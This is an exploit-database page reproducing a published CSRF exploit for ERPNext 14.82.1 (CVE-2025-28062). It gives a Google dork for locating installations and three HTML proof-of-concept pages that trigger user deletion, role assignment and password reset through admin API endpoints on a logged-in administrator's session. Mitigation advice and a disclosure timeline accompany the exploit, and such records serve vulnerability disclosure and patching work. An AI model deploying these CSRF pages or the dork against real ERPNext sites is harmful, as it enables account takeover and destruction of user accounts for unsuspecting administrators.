header-logo
Suggest Exploit
vendor:
ERPNext
by:
Ahmed Thaiban (Thvt0ne)
6.1
CVSS
HIGH
Cross-Site Request Forgery (CSRF) leading to Account Takeover
352
CWE
Product Name: ERPNext
Affected Version From: <= 14.82.1
Affected Version To: 14.74.3
Patch Exists: NO
Related CWE: CVE-2025-28062
CPE: a:frappe:erpnext:14.82.1
Metasploit:
Other Scripts:
Platforms Tested: Linux (Ubuntu 20.04), Chrome, Firefox
2025

ERPNext 14.82.1 – Account Takeover via Cross-Site Request Forgery (CSRF)

A CSRF vulnerability in ERPNext versions 14.82.1 and 14.74.3 allows attackers to manipulate the accounts of logged-in administrators without their consent. This can lead to unauthorized actions such as user deletion, role assignment, and account takeover through password changes.

Mitigation:

To mitigate this issue, enforce CSRF protection on all administrative endpoints, mandate the use of POST requests for state modifications, set cookies as SameSite=Strict, and introduce re-authentication mechanisms for critical user modifications.
Source

Exploit-DB raw data:

# Exploit Title: ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF)
# Google Dork: inurl:"/api/method/frappe"
# Date: 2025-04-29
# Exploit Author: Ahmed Thaiban (Thvt0ne)
# Vendor Homepage: https://erpnext.com
# Software Link: https://github.com/frappe/erpnext
# Version: <= 14.82.1, 14.74.3 (Tested)
# Tested on: Linux (Ubuntu 20.04), Chrome, Firefox.
# CVE : CVE-2025-28062
# Category: WebApps

# Description:
A Cross-Site Request Forgery (CSRF) vulnerability Lead to Account Takeover exists in ERPNext 14.82.1 and 14.74.3. This flaw allows an attacker to perform unauthorized state-changing operations on behalf of a logged-in administrator without their knowledge or consent.

Affected endpoints include:
- /api/method/frappe.desk.reportview.delete_items
- /api/method/frappe.desk.form.save.savedocs

Impact:
- Deletion of arbitrary users
- Unauthorized role assignment
- Account takeover via password change

The application fails to enforce CSRF tokens on administrative API requests, violating OWASP recommendations.

---

# PoC 1: Delete a User

<html>
  <body>
    <h2>Delete User</h2>
    <a href="http://target/api/method/frappe.desk.reportview.delete_items?items=%5B%221%401.com%22%5D&doctype=User">
      Click Here
    </a>
  </body>
</html>

---

# PoC 2: Assign Role

<html>
  <body>
    <h2>Assign Role to User</h2>
    <a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
      Add Role
    </a>
  </body>
</html>

---

# PoC 3: Reset Password

<html>
  <body>
    <h2>Reset User Password</h2>
    <a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
      Reset Password
    </a>
  </body>
</html>

---

# Mitigation:
- Enforce CSRF protection for all administrative endpoints
- Require POST methods for state changes
- Mark cookies as SameSite=Strict
- Implement re-authentication for critical user changes

---

# Disclosure Timeline:
- 2025-02-09: Vulnerability discovered
- 2025-02-10: Reported to Frappe (no response)
- 2025-04-29: Public disclosure via CVE + advisory

---

# Author Contact:
LinkedIn: https://linkedin.com/in/ahmedth
GitHub: https://github.com/Thvt0ne

# References:
- https://owasp.org/www-community/attacks/csrf

Navigation

Suggest Exploit

Services By CQR